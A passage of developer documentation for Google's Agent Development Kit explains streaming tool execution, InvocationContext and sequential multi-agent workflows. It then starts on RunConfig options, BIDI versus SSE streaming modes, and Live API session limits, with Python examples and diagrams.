**Detects** when the model returns function calls in streaming responses - **Executes** tools in parallel for maximum performance - **Handles** before/after tool callbacks for custom logic - **Formats** function responses according to Live API requirements - **Sends** responses back to the model seamlessly - **Yields** both function call and response events to your application ### Tool Execution Events When tools execute, you'll receive events through the `run_live()` async generator: **Usage:** ```python async for event in runner.run_live(...): # Function call event - model requesting tool execution if event.get_function_calls(): print(f"Model calling: {event.get_function_calls()[0].name}") # Function response event - tool execution result if event.get_function_responses(): print(f"Tool result: {event.get_function_responses()[0].response}") ``` You don't need to handle the execution yourself—ADK does it automatically. You just observe the events as they flow through the conversation. Learn More The bidi-demo sends all events (including function calls and responses) directly to the WebSocket client without server-side filtering. This allows the client to observe tool execution in real-time through the event stream. See the downstream task in [`main.py:219-234`](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234) ### Long-Running and Streaming Tools ADK supports advanced tool patterns that integrate seamlessly with `run_live()`: **Long-Running Tools**: Tools that require human approval or take extended time to complete. Mark them with `is_long_running=True`. In resumable async flows, ADK can pause after long-running calls. In live flows, streaming continues; `long_running_tool_ids` indicate pending operations and clients can display appropriate UI. **Streaming Tools**: Tools that accept an `input_stream` parameter with type `LiveRequestQueue` can send real-time updates back to the model during execution, enabling progressive responses. How Streaming Tools Work When you call `runner.run_live()`, ADK inspects your agent's tools at initialization (lines 828-865 in `runners.py`) to identify streaming tools by checking parameter type annotations for `LiveRequestQueue`. **Queue creation and lifecycle**: 1. **Creation**: ADK creates an `ActiveStreamingTool` with a dedicated `LiveRequestQueue` for each streaming tool at the start of `run_live()` (before processing any events) 1. **Storage**: These queues are stored in `invocation_context.active_streaming_tools[tool_name]` for the duration of the invocation 1. **Injection**: When the model calls the tool, ADK automatically injects the tool's queue as the `input_stream` parameter (lines 238-253 in `function_tool.py`) 1. **Usage**: The tool can use this queue to send real-time updates back to the model during execution 1. **Lifecycle**: The queues persist for the entire `run_live()` invocation (one InvocationContext = one `run_live()` call) and are destroyed when `run_live()` exits **Queue distinction**: - **Main queue** (`live_request_queue` parameter): Created by your application, used for client-to-model communication - **Tool queues** (`active_streaming_tools[tool_name].stream`): Created automatically by ADK, used for tool-to-model communication during execution Both types of queues are `LiveRequestQueue` instances, but they serve different purposes in the streaming architecture. This enables tools to provide incremental updates, progress notifications, or partial results during long-running operations. **Code reference**: See `runners.py:828-865` (tool detection) and `function_tool.py:238-253` (parameter injection) for implementation details. See the [Tools Guide](https://google.github.io/adk-docs/tools/) for implementation examples. ### Key Takeaway The difference between raw Live API tool use and ADK is stark: | Aspect | Raw Live API | ADK `run_live()` | | ------------------------- | ------------------------------- | ------------------------------- | | **Tool Declaration** | Manual schema definition | Automatic from Python functions | | **Tool Execution** | Manual handling in app code | Automatic parallel execution | | **Response Formatting** | Manual JSON construction | Automatic | | **Error Handling** | Manual try/catch and formatting | Automatic capture and reporting | | **Streaming Integration** | Manual coordination | Automatic event yielding | | **Developer Experience** | Complex, error-prone | Declarative, simple | This automatic handling is one of the core value propositions of ADK—it transforms the complexity of Live API tool use into a simple, declarative developer experience. ## InvocationContext: The Execution State Container Source Reference See InvocationContext implementation in [`invocation_context.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/invocation_context.py) While `run_live()` returns an AsyncGenerator for consuming events, internally it creates and manages an `InvocationContext`—ADK's unified state carrier that encapsulates everything needed for a complete conversation invocation. **One InvocationContext corresponds to one `run_live()` loop**—it's created when you call `run_live()` and persists for the entire streaming session. Think of it as a traveling notebook that accompanies a conversation from start to finish, collecting information, tracking progress, and providing context to every component along the way. It's ADK's runtime implementation of the Context concept, providing the execution-time state and services needed during a live conversation. For a broader overview of context in ADK, see [Context in ADK](https://google.github.io/adk-docs/context/). ### What is an Invocation? An **invocation** represents a complete interaction cycle: - Starts with user input (text, audio, or control signal) - May involve one or multiple agent calls - Ends when a final response is generated or when explicitly terminated - Is orchestrated by `runner.run_live()` or `runner.run_async()` This is distinct from an **agent call** (execution of a single agent's logic) and a **step** (a single LLM call plus any resulting tool executions). The hierarchy looks like this: ```text ┌─────────────────────── invocation ──────────────────────────┐ ┌──────────── llm_agent_call_1 ────────────┐ ┌─ agent_call_2 ─┐ ┌──── step_1 ────────┐ ┌───── step_2 ──────┐ [call_llm] [call_tool] [call_llm] [transfer] ``` ### Who Uses InvocationContext? InvocationContext serves different audiences at different levels: - **ADK's internal components** (primary users): Runner, Agent, LLMFlow, and GeminiLlmConnection all receive, read from, and write to the InvocationContext as it flows through the stack. This shared context enables seamless coordination without tight coupling. - **Application developers** (indirect beneficiaries): You don't typically create or manipulate InvocationContext directly in your application code. Instead, you benefit from the clean, simplified APIs that InvocationContext enables behind the scenes—like the elegant `async for event in runner.run_live()` pattern. - **Tool and callback developers** (direct access): When you implement custom tools or callbacks, you receive InvocationContext as a parameter. This gives you direct access to conversation state, session services, and control flags (like `end_invocation`) to implement sophisticated behaviors. #### What InvocationContext Contains When you implement custom tools or callbacks, you receive InvocationContext as a parameter. Here's what's available to you: **Essential Fields for Tool/Callback Developers:** - **`context.invocation_id`**: Current invocation identifier (unique per `run_live()` call) - **`context.session`**: - **`context.session.events`**: All events in the session history (across all invocations) - **`context.session.state`**: Persistent key-value store for session data - **`context.session.user_id`**: User identity - **`context.run_config`**: Current streaming configuration (response modalities, transcription settings, cost limits) - **`context.end_invocation`**: Set this to `True` to immediately terminate the conversation (useful for error handling or policy enforcement) **Example Use Cases in Tool Development:** ```python # Example: Comprehensive tool implementation showing common InvocationContext patterns def my_tool(context: InvocationContext, query: str): # Access user identity user_id = context.session.user_id # Check if this is the user's first message event_count = len(context.session.events) if event_count == 0: return "Welcome! This is your first message." # Access conversation history recent_events = context.session.events[-5:] # Last 5 events # Access persistent session state # Session state persists across invocations (not just this streaming session) user_preferences = context.session.state.get('user_preferences', {}) # Update session state (will be persisted) context.session.state['last_query_time'] = datetime.now().isoformat() # Access services for persistence if context.artifact_service: # Store large files/audio await context.artifact_service.save_artifact( app_name=context.session.app_name, user_id=context.session.user_id, session_id=context.session.id, filename="result.bin", artifact=types.Part(inline_data=types.Blob(mime_type="application/octet-stream", data=data)), ) # Process the query with context result = process_query(query, context=recent_events, preferences=user_preferences) # Terminate conversation in specific scenarios if result.get('error'): # Processing error - stop conversation context.end_invocation = True return result ``` Understanding InvocationContext is essential for grasping how ADK maintains state, coordinates execution, and enables advanced features like multi-agent workflows and resumability. Even if you never touch it directly, knowing what flows through your application helps you design better agents and debug issues more effectively. ## Best Practices for Multi-Agent Workflows ADK's bidirectional streaming supports three agent architectures: **single agent** (one agent handles the entire conversation), **multi-agent with sub-agents** (a coordinator agent dynamically routes to specialist agents using `transfer_to_agent`), and **sequential workflow agents** (agents execute in a fixed pipeline using `task_completed`). This section focuses on best practices for sequential workflows, where understanding agent transitions and state sharing is crucial for smooth BIDI communication. Learn More For comprehensive coverage of multi-agent patterns, see [Workflow Agents as Orchestrators](https://google.github.io/adk-docs/agents/multi-agents/#workflow-agents-as-orchestrators) in the ADK documentation. When building multi-agent systems with ADK, understanding how agents transition and share state during live streaming is crucial for smooth BIDI communication. ### SequentialAgent with BIDI Streaming `SequentialAgent` enables workflow pipelines where agents execute one after another. Each agent completes its task before the next one begins. The challenge with live streaming is determining when an agent has finished processing continuous audio or video input. Source Reference See SequentialAgent implementation in [`sequential_agent.py:119-158`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/sequential_agent.py#L119-L158) **How it works:** ADK automatically adds a `task_completed()` function to each agent in the sequence. When the model calls this function, it signals completion and triggers the transition to the next agent: **Usage:** ```python # SequentialAgent automatically adds this tool to each sub-agent def task_completed(): """ Signals that the agent has successfully completed the user's question or task. """ return 'Task completion signaled.' ``` ### Recommended Pattern: Transparent Sequential Flow The key insight is that **agent transitions happen transparently** within the same `run_live()` event stream. Your application doesn't need to manage transitions—just consume events uniformly: **Usage:** ```python async def handle_sequential_workflow(): """Recommended pattern for SequentialAgent with BIDI streaming.""" # 1. Single queue shared across all agents in the sequence queue = LiveRequestQueue() # 2. Background task captures user input continuously async def capture_user_input(): while True: # Your logic to read audio from microphone audio_chunk = await microphone.read() queue.send_realtime( blob=types.Blob(data=audio_chunk, mime_type="audio/pcm") ) input_task = asyncio.create_task(capture_user_input()) try: # 3. Single event loop handles ALL agents seamlessly async for event in runner.run_live( user_id="user_123", session_id="session_456", live_request_queue=queue, ): # Events flow seamlessly across agent transitions current_agent = event.author # Handle audio and text output if event.content and event.content.parts: for part in event.content.parts: # Check for audio data if part.inline_data and part.inline_data.mime_type.startswith("audio/"): # Your logic to play audio await play_audio(part.inline_data.data) # Check for text data if part.text: await display_text(f"[{current_agent}] {part.text}") # No special transition handling needed! finally: input_task.cancel() queue.close() ``` ### Event Flow During Agent Transitions Here's what your application sees when agents transition: ```text # Agent 1 (Researcher) completes its work Event: author="researcher", text="I've gathered all the data." Event: author="researcher", function_call: task_completed() Event: author="researcher", function_response: task_completed # --- Automatic transition (invisible to your code) --- # Agent 2 (Writer) begins Event: author="writer", text="Let me write the report based on the research..." Event: author="writer", text=" The findings show..." Event: author="writer", function_call: task_completed() Event: author="writer", function_response: task_completed # --- Automatic transition --- # Agent 3 (Reviewer) begins - the last agent in sequence Event: author="reviewer", text="Let me review the report..." Event: author="reviewer", text="The report looks good. All done!" Event: author="reviewer", function_call: task_completed() Event: author="reviewer", function_response: task_completed # --- Last agent completed: run_live() exits --- # Your async for loop ends here ``` ### Design Principles #### 1. Single Event Loop Use one event loop for all agents in the sequence: **Usage:** ```python # ✅ CORRECT: One loop handles all agents async for event in runner.run_live(...): # Your event handling logic here await handle_event(event) # Works for Agent1, Agent2, Agent3... # ❌ INCORRECT: Don't break the loop or create multiple loops for agent in agents: async for event in runner.run_live(...): # WRONG! ... ``` #### 2. Persistent Queue The same `LiveRequestQueue` serves all agents: ```text # User input flows to whichever agent is currently active User speaks → Queue → Agent1 (researcher) ↓ User speaks → Queue → Agent2 (writer) ↓ User speaks → Queue → Agent3 (reviewer) ``` **Don't create new queues per agent:** ```python # ❌ INCORRECT: New queue per agent for agent in agents: new_queue = LiveRequestQueue() # WRONG! # ✅ CORRECT: Single queue for entire workflow queue = LiveRequestQueue() async for event in runner.run_live(live_request_queue=queue): ... ``` #### 3. Agent-Aware UI (Optional) Track which agent is active for better user experience: **Usage:** ```python current_agent_name = None async for event in runner.run_live(...): # Detect agent transitions if event.author and event.author != current_agent_name: current_agent_name = event.author # Your logic to update UI indicator await update_ui_indicator(f"Now: {current_agent_name}") # Your event handling logic here await handle_event(event) ``` #### 4. Transition Notifications Optionally notify users when agents hand off: **Usage:** ```python async for event in runner.run_live(...): # Detect task completion (transition signal) if event.content and event.content.parts: for part in event.content.parts: if (part.function_response and part.function_response.name == "task_completed"): # Your logic to display transition notification await display_notification( f"✓ {event.author} completed. Handing off to next agent..." ) continue # Your event handling logic here await handle_event(event) ``` ### Key Differences: transfer_to_agent vs task_completed Understanding these two functions helps you choose the right multi-agent pattern: | Function | Agent Pattern | When `run_live()` Exits | Use Case | | ------------------- | ----------------------------- | ---------------------------------------------------------------- | ----------------------------------------- | | `transfer_to_agent` | Coordinator (dynamic routing) | `LiveRequestQueue.close()` | Route user to specialist based on intent | | `task_completed` | Sequential (pipeline) | `LiveRequestQueue.close()` or `task_completed` of the last agent | Fixed workflow: research → write → review | **transfer_to_agent example:** ```text # Coordinator routes based on user intent User: "I need help with billing" Event: author="coordinator", function_call: transfer_to_agent(agent_name="billing") # Stream continues with billing agent - same run_live() loop Event: author="billing", text="I can help with your billing question..." ``` **task_completed example:** ```text # Sequential workflow progresses through pipeline Event: author="researcher", function_call: task_completed() # Current agent exits, next agent in sequence begins Event: author="writer", text="Based on the research..." ``` ### Best Practices Summary | Practice | Reason | | --------------------------------------- | ----------------------------------------- | | Use single event loop | ADK handles transitions internally | | Keep queue alive across agents | Same queue serves all sequential agents | | Track `event.author` | Know which agent is currently responding | | Don't reset session/context | Conversation state persists across agents | | Handle events uniformly | All agents produce the same event types | | Let `task_completed` signal transitions | Don't manually manage sequential flow | The SequentialAgent design ensures smooth transitions—your application simply sees a continuous stream of events from different agents in sequence, with automatic handoffs managed by ADK. ## Summary In this part, you mastered event handling in ADK's Bidi-streaming architecture. We explored the different event types that agents generate—text responses, audio chunks, transcriptions, tool calls, and control signals—and learned how to process each event type effectively. You now understand how to handle interruptions and turn completion signals for natural conversation flow, serialize events for network transport using Pydantic's model serialization, leverage ADK's automatic tool execution to simplify agent workflows, and access InvocationContext for advanced state management scenarios. With these event handling patterns in place, you're equipped to build responsive streaming applications that provide real-time feedback to users. Next, you'll learn how to configure sophisticated streaming behaviors through RunConfig, including multimodal interactions, session resumption, and cost controls. ______________________________________________________________________ ← [Previous: Part 2: Sending Messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) | [Next: Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) → # Part 4: Understanding RunConfig In Part 3, you learned how to handle events from `run_live()` to process model responses, tool calls, and streaming updates. This part shows you how to configure those streaming sessions through `RunConfig`—controlling response formats, managing session lifecycles, and enforcing production constraints. **What you'll learn**: This part covers response modalities and their constraints, explores the differences between BIDI and SSE streaming modes, examines the relationship between ADK Sessions and Live API sessions, and shows how to manage session duration with session resumption and context window compression. You'll understand how to handle concurrent session quotas, implement architectural patterns for quota management, and configure cost controls through `max_llm_calls` and audio persistence options. With RunConfig mastery, you can build production-ready streaming applications that balance feature richness with operational constraints. Learn More For detailed information about audio/video related `RunConfig` configurations, see [Part 5: Audio, Image and Video in Live API](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md). ## RunConfig Parameter Quick Reference This table provides a quick reference for all RunConfig parameters covered in this part: | Parameter | Type | Purpose | Platform Support | Reference | | ------------------------------ | ------------------------------ | ------------------------------------- | -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | | **response_modalities** | list[str] | Control output format (TEXT or AUDIO) | Both | [Details](#response-modalities) | | **streaming_mode** | StreamingMode | Choose BIDI or SSE mode | Both | [Details](#streamingmode-bidi-or-sse) | | **session_resumption** | SessionResumptionConfig | Enable automatic reconnection | Both | [Details](#live-api-session-resumption) | | **context_window_compression** | ContextWindowCompressionConfig | Unlimited session duration | Both | [Details](#live-api-context-window-compression) | | **max_llm_calls** | int | Limit total LLM calls per session | Both | [Details](#max_llm_calls) | | **save_live_blob** | bool | Persist audio/video streams | Both | [Details](#save_live_blob) | | **custom_metadata** | dict[str, Any] | Attach metadata to invocation events | Both | [Details](#custom_metadata) | | **support_cfc** | bool | Enable compositional function calling | Gemini (2.x models only) | [Details](#support_cfc-experimental) | | **speech_config** | SpeechConfig | Voice and language configuration | Both | [Part 5: Voice Configuration](https://google.github.io/adk-docs/streaming/dev-guide/part5/#voice-configuration-speech-config) | | **input_audio_transcription** | AudioTranscriptionConfig | Transcribe user speech | Both | [Part 5: Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription) | | **output_audio_transcription** | AudioTranscriptionConfig | Transcribe model speech | Both | [Part 5: Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription) | | **realtime_input_config** | RealtimeInputConfig | VAD configuration | Both | [Part 5: Voice Activity Detection](https://google.github.io/adk-docs/streaming/dev-guide/part5/#voice-activity-detection-vad) | | **proactivity** | ProactivityConfig | Enable proactive audio | Gemini (native audio only) | [Part 5: Proactivity and Affective Dialog](https://google.github.io/adk-docs/streaming/dev-guide/part5/#proactivity-and-affective-dialog) | | **enable_affective_dialog** | bool | Emotional adaptation | Gemini (native audio only) | [Part 5: Proactivity and Affective Dialog](https://google.github.io/adk-docs/streaming/dev-guide/part5/#proactivity-and-affective-dialog) | Source Reference [`run_config.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/run_config.py) **Platform Support Legend:** - **Both**: Supported on both Gemini Live API and Vertex AI Live API - **Gemini**: Only supported on Gemini Live API - **Model-specific**: Requires specific model architecture (e.g., native audio) **Import Paths:** All configuration type classes referenced in the table above are imported from `google.genai.types`: ```python from google.genai import types from google.adk.agents.run_config import RunConfig, StreamingMode # Configuration types are accessed via types module run_config = RunConfig( session_resumption=types.SessionResumptionConfig(), context_window_compression=types.ContextWindowCompressionConfig(...), speech_config=types.SpeechConfig(...), # etc. ) ``` The `RunConfig` class itself and `StreamingMode` enum are imported from `google.adk.agents.run_config`. ## Response Modalities Response modalities control how the model generates output—as text or audio. Both Gemini Live API and Vertex AI Live API have the same restriction: only one response modality per session. **Configuration:** ```python # Phase 2: Session initialization - RunConfig determines streaming behavior # Default behavior: ADK automatically sets response_modalities to ["AUDIO"] # when not specified (required by native audio models) run_config = RunConfig( streaming_mode=StreamingMode.BIDI # Bidirectional WebSocket communication ) # The above is equivalent to: run_config = RunConfig( response_modalities=["AUDIO"], # Automatically set by ADK in run_live() streaming_mode=StreamingMode.BIDI # Bidirectional WebSocket communication ) # ✅ CORRECT: Text-only responses run_config = RunConfig( response_modalities=["TEXT"], # Model responds with text only streaming_mode=StreamingMode.BIDI # Still uses bidirectional streaming ) # ✅ CORRECT: Audio-only responses (explicit) run_config = RunConfig( response_modalities=["AUDIO"], # Model responds with audio only streaming_mode=StreamingMode.BIDI # Bidirectional WebSocket communication ) ``` Both Gemini Live API and Vertex AI Live API restrict sessions to a single response modality. Attempting to use both will result in an API error: ```python # ❌ INCORRECT: Both modalities not supported run_config = RunConfig( response_modalities=["TEXT", "AUDIO"], # ERROR: Cannot use both streaming_mode=StreamingMode.BIDI ) # Error from Live API: "Only one response modality is supported per session" ``` **Default Behavior:** When `response_modalities` is not specified, ADK's `run_live()` method automatically sets it to `["AUDIO"]` because native audio models require an explicit response modality. You can override this by explicitly setting `response_modalities=["TEXT"]` if needed. **Key constraints:** - You must choose either `TEXT` or `AUDIO` at session start. **Cannot switch between modalities mid-session** - You must choose `AUDIO` for [Native Audio models](https://google.github.io/adk-docs/streaming/dev-guide/part5/#understanding-audio-model-architectures). If you want to receive both audio and text responses from native audio models, use the Audio Transcript feature which provides text transcripts of the audio output. See [Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription) for details - Response modality only affects model output—**you can always send text, voice, or video input (if the model supports those input modalities)** regardless of the chosen response modality ## StreamingMode: BIDI or SSE ADK supports two distinct streaming modes that use different API endpoints and protocols: - `StreamingMode.BIDI`: ADK uses WebSocket to connect to the **Live API** (the bidirectional streaming endpoint via `live.connect()`) - `StreamingMode.SSE`: ADK uses HTTP streaming to connect to the **standard Gemini API** (the unary/streaming endpoint via `generate_content_async()`) "Live API" refers specifically to the bidirectional WebSocket endpoint (`live.connect()`), while "Gemini API" or "standard Gemini API" refers to the traditional HTTP-based endpoint (`generate_content()` / `generate_content_async()`). Both are part of the broader Gemini API platform but use different protocols and capabilities. **Note:** These modes refer to the **ADK-to-Gemini API communication protocol**, not your application's client-facing architecture. You can build WebSocket servers, REST APIs, SSE endpoints, or any other architecture for your clients with either mode. This guide focuses on `StreamingMode.BIDI`, which is required for real-time audio/video interactions and Live API features. However, it's worth understanding the differences between BIDI and SSE modes to choose the right approach for your use case. **Configuration:** ```python from google.adk.agents.run_config import RunConfig, StreamingMode # BIDI streaming for real-time audio/video run_config = RunConfig( streaming_mode=StreamingMode.BIDI, response_modalities=["AUDIO"] # Supports audio/video modalities ) # SSE streaming for text-based interactions run_config = RunConfig( streaming_mode=StreamingMode.SSE, response_modalities=["TEXT"] # Text-only modality ) ``` ### Protocol and Implementation Differences The two streaming modes differ fundamentally in their communication patterns and capabilities. BIDI mode enables true bidirectional communication where you can send new input while receiving model responses, while SSE mode follows a traditional request-then-response pattern where you send a complete request and stream back the response. **StreamingMode.BIDI - Bidirectional WebSocket Communication:** BIDI mode establishes a persistent WebSocket connection that allows simultaneous sending and receiving. This enables real-time features like interruptions, live audio streaming, and immediate turn-taking: ``` sequenceDiagram participant App as Your Application participant ADK as ADK participant Queue as LiveRequestQueue participant Gemini as Gemini Live API Note over ADK,Gemini: Protocol: WebSocket App->>ADK: runner.run_live(run_config) ADK->>Gemini: live.connect() - WebSocket activate Gemini Note over ADK,Queue: Can send while receiving App->>Queue: send_content(text) Queue->>Gemini: → Content (via WebSocket) App->>Queue: send_realtime(audio) Queue->>Gemini: → Audio blob (via WebSocket) Gemini-->>ADK: ← Partial response (partial=True) ADK-->>App: ← Event: partial text/audio Gemini-->>ADK: ← Partial response (partial=True) ADK-->>App: ← Event: partial text/audio App->>Queue: send_content(interrupt) Queue->>Gemini: → New content Gemini-->>ADK: ← turn_complete=True ADK-->>App: ← Event: turn complete deactivate Gemini Note over ADK,Gemini: Turn Detection: turn_complete flag ``` **StreamingMode.SSE - Unidirectional HTTP Streaming:** SSE (Server-Sent Events) mode uses HTTP streaming where you send a complete request upfront, then receive the response as a stream of chunks. This is a simpler, more traditional pattern suitable for text-based chat applications: ``` sequenceDiagram participant App as Your Application participant ADK as ADK participant Gemini as Gemini API Note over ADK,Gemini: Protocol: HTTP App->>ADK: runner.run(run_config) ADK->>Gemini: generate_content_stream() - HTTP activate Gemini Note over ADK,Gemini: Request sent completely, then stream response Gemini-->>ADK: ← Partial chunk (partial=True) ADK-->>App: ← Event: partial text Gemini-->>ADK: ← Partial chunk (partial=True) ADK-->>App: ← Event: partial text Gemini-->>ADK: ← Partial chunk (partial=True) ADK-->>App: ← Event: partial text Gemini-->>ADK: ← Final chunk (finish_reason=STOP) ADK-->>App: ← Event: complete response deactivate Gemini Note over ADK,Gemini: Turn Detection: finish_reason ``` ### Progressive SSE Streaming **Progressive SSE streaming** is a feature that enhances how SSE mode delivers streaming responses. This feature improves response aggregation by: - **Content ordering preservation**: Maintains the original order of mixed content types (text, function calls, inline data) - **Intelligent text merging**: Only merges consecutive text parts of the same type (regular text vs thought text) - **Progressive delivery**: Marks all intermediate chunks as `partial=True`, with a single final aggregated response at the end - **Deferred function execution**: Skips executing function calls in partial events, only executing them in the final aggregated event to ensure parallel function calls are executed together rather than sequentially - **Function call argument streaming**: Supports progressive building of function call arguments through `partial_args`, enabling real-time display of function call construction **Default Behavior:** When you use `StreamingMode.SSE`, progressive SSE streaming is **enabled by default**. This means you automatically benefit from these improvements without any additional configuration. **Disabling the feature (if needed):** If you need to revert to the legacy SSE streaming behavior (simple text accumulation), you can disable it via environment variable: ```bash export ADK_DISABLE_PROGRESSIVE_SSE_STREAMING=1 ``` Legacy Behavior Trade-offs Disabling progressive SSE streaming reverts to simple text accumulation, which: - May lose original content ordering when mixing text and function calls - Does not support function call argument streaming via `partial_args` - Is provided for backward compatibility only—new applications should use the default progressive mode **When progressive SSE streaming helps:** - You're using `StreamingMode.SSE` and have mixed content types (text + function calls) - Your responses include thought text (extended thinking) mixed with regular text - You want to ensure function calls execute only once after complete response aggregation - You need to display function call construction in real-time as arguments stream in **Note:** This feature only affects `StreamingMode.SSE`. It does not apply to `StreamingMode.BIDI` (the focus of this guide), which uses the Live API's native bidirectional protocol. ### When to Use Each Mode Your choice between BIDI and SSE depends on your application requirements and the interaction patterns you need to support. Here's a practical guide to help you choose: **Use BIDI when:** - Building voice/video applications with real-time interaction - Need bidirectional communication (send while receiving) - Require Live API features (audio transcription, VAD, proactivity, affective dialog) - Supporting interruptions and natural turn-taking (see [Part 3: Handling Interrupted Flag](https://google.github.io/adk-docs/streaming/dev-guide/part3/#handling-interrupted-flag)) - Implementing live streaming tools or real-time data feeds - Can plan for concurrent session quotas (50-1,000 sessions depending on platform/tier) **Use SSE when:** - Building text-based chat applications - Standard request/response interaction pattern - Using models without Live API support (e.g., Gemini 1.5 Pro, Gemini 1.5 Flash) - Simpler deployment without WebSocket requirements - Need larger context windows (Gemini 1.5 supports up to 2M tokens) - Prefer standard API rate limits (RPM/TPM) over concurrent session quotas Streaming Mode and Model Compatibility SSE mode uses the standard Gemini API (`generate_content_async`) via HTTP streaming, while BIDI mode uses the Live API (`live.connect()`) via WebSocket. Gemini 1.5 models (Pro, Flash) don't support the Live API protocol and therefore must be used with SSE mode. Gemini 2.0/2.5 Live models support both protocols but are typically used with BIDI mode to access real-time audio/video features. ### Standard Gemini Models (1.5 Series) Accessed via SSE While this guide focuses on Bidi-streaming with Gemini 2.0 Live models, ADK also supports the Gemini 1.5 model family through SSE streaming. These models offer different trade-offs—larger context windows and proven stability, but without real-time audio/video features. Here's what the 1.5 series supports when accessed via SSE: **Models:** - `gemini-1.5-pro` - `gemini-1.5-flash` **Supported:** - ✅ Text input/output (`response_modalities=["TEXT"]`) - ✅ SSE streaming (`StreamingMode.SSE`) - ✅ Function calling with automatic execution - ✅ Large context windows (up to 2M tokens for 1.5-pro) **Not Supported:** - ❌ Live audio features (audio I/O, transcription, VAD) - ❌ Bidi-streaming via `run_live()` - ❌ Proactivity and affective dialog - ❌ Video input ## Understanding Live API Connections and Sessions When building ADK Bidi-streaming applications, it's essential to understand how ADK manages the communication layer between itself and the Live API backend. This section explores the fundamental distinction between **connections** (the WebSocket transport links that ADK establishes to Live API) and **sessions** (the logical conversation contexts maintained by Live API). Unlike traditional request-response APIs, the Bidi-streaming architecture introduces unique constraints: connection timeouts, session duration limits that vary by modality (audio-only vs audio+video), finite context windows, and concurrent session quotas that differ between Gemini Live API and Vertex AI Live API. ### ADK `Session` vs Live API Session Understanding the distinction between **ADK `Session`** and **Live API session** is crucial for building reliable streaming applications with ADK Bidi-streaming. **ADK `Session`** (managed by SessionService): - Persistent conversation storage for conversation history, events, and state, created via `SessionService.create_session()` - Storage options: in-memory, database (PostgreSQL/MySQL/SQLite), or Vertex AI - Survives across multiple `run_live()` calls and application restarts (with the persistent `SessionService`) **Live API session** (managed by Live API backend): - Maintained by the Live API during the `run_live()` event loop is running, and destroyed when streaming ends by calling `LiveRequestQueue.close()` - Subject to platform duration limits, and can be resumed across multiple connections using session resumption handles (see [How ADK Manages Session Resumption](#how-adk-manages-session-resumption) below) **How they work together:** 1. **When `run_live()` is called:** 1. Retrieves the ADK `Session` from `SessionService` 1. Initializes the Live API session with conversation history from `session.events` 1. Streams events bidirectionally with the Live API backend 1. Updates the ADK `Session` with new events as they occur 1. **When `run_live()` ends** 1. The Live API session terminates 1. The ADK `Session` persists 1. **When `run_live()` is called again** or **the application is restarted**: - ADK loads the history from the ADK `Session` - Creates a new Live API session with that context In short, ADK `Session` provides persistent, long-term conversation storage, while Live API sessions are ephemeral streaming contexts. This separation enables production applications to maintain conversation continuity across network interruptions, application restarts, and multiple streaming sessions. The following diagram illustrates the relationship between ADK Session persistence and ephemeral Live API session contexts, showing how conversation history is maintained across multiple `run_live()` calls: ``` sequenceDiagram participant App as Your Application participant SS as SessionService participant ADK_Session as ADK Session
(Persistent Storage) participant ADK as ADK (run_live) participant LiveSession as Live API Session
(Ephemeral) Note over App,LiveSession: First run_live() call App->>SS: get_session(user_id, session_id) SS->>ADK_Session: Load session data ADK_Session-->>SS: Session with events history SS-->>App: Session object App->>ADK: runner.run_live(...) ADK->>LiveSession: Initialize with history from ADK Session activate LiveSession Note over ADK,LiveSession: Bidirectional streaming... ADK->>ADK_Session: Update with new events App->>ADK: queue.close() ADK->>LiveSession: Terminate deactivate LiveSession Note over LiveSession: Live API session destroyed Note over ADK_Session: ADK Session persists Note over App,LiveSession: Second run_live() call (or after restart) App->>SS: get_session(user_id, session_id) SS->>ADK_Session: Load session data ADK_Session-->>SS: Session with events history SS-->>App: Session object (with previous history) App->>ADK: runner.run_live(...) ADK->>LiveSession: Initialize new session with full history activate LiveSession Note over ADK,LiveSession: Bidirectional streaming continues... ``` **Key insights:** - ADK Session survives across multiple `run_live()` calls and app restarts - Live API session is ephemeral - created and destroyed per streaming session - Conversation continuity is maintained through ADK Session's persistent storage - SessionService manages the persistence layer (in-memory, database, or Vertex AI) Now that we understand the difference between ADK `Session` objects and Live API sessions, let's focus on Live API connections and sessions—the backend infrastructure that powers real-time bidirectional streaming. ### Live API Connections and Sessions Understanding the distinction between **connections** and **sessions** at the Live API level is crucial for building reliable ADK Bidi-streaming applications. **Connection**: The physical WebSocket link between ADK and the Live API server. This is the network transport layer that carries bidirectional streaming data. **Session**: The logical conversation context maintained by the Live API, including conversation history, tool call state, and model context. A session can span multiple connections. | **Aspect** | **Connection** | **Session** | | ------------------ | ---------------------------- | ----------------------------------- | | **What is it?** | WebSocket network connection | Logical conversation context | | **Scope** | Transport layer | Application layer | | **Can span?** | Single network link | Multiple connections via resumption | | **Failure impact** | Network error or timeout | Lost conversation history | #### Live API Connection and Session Limits by Platform Understanding the constraints of each platform is critical for production planning. Gemini Live API and Vertex AI Live API have different limits that affect how long conversations can run and how many users can connect simultaneously. The most important distinction is between **connection duration** (how long a single WebSocket connection stays open) and **session duration** (how long a logical conversation can continue). | Constraint Type | Gemini Live API (Google AI Studio) | Vertex AI Live API (Google Cloud) | Notes | | ------------------------------------ | ---------------------------------- | --------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | | **Connection duration** | ~10 minutes | Not documented separately | Each Gemini WebSocket connection auto-terminates; ADK reconnects transparently with session resumption | | **Session Duration (Audio-only)** | 15 minutes | 10 minutes | Maximum session duration without context window compression. Both platforms: unlimited with context window compression enabled | | **Session Duration (Audio + video)** | 2 minutes | 10 minutes | Gemini has shorter limit for video; Vertex treats all sessions equally. Both platforms: unlimited with context window compression enabled | | **Concurrent sessions** | 50 (Tier 1) 1,000 (Tier 2+) | Up to 1,000 | Gemini limits vary by API tier; Vertex limit is per Google Cloud project | Source References - [Gemini Live API Capabilities Guide](https://ai.google.dev/gemini-api/docs/live-guide) - [Gemini API 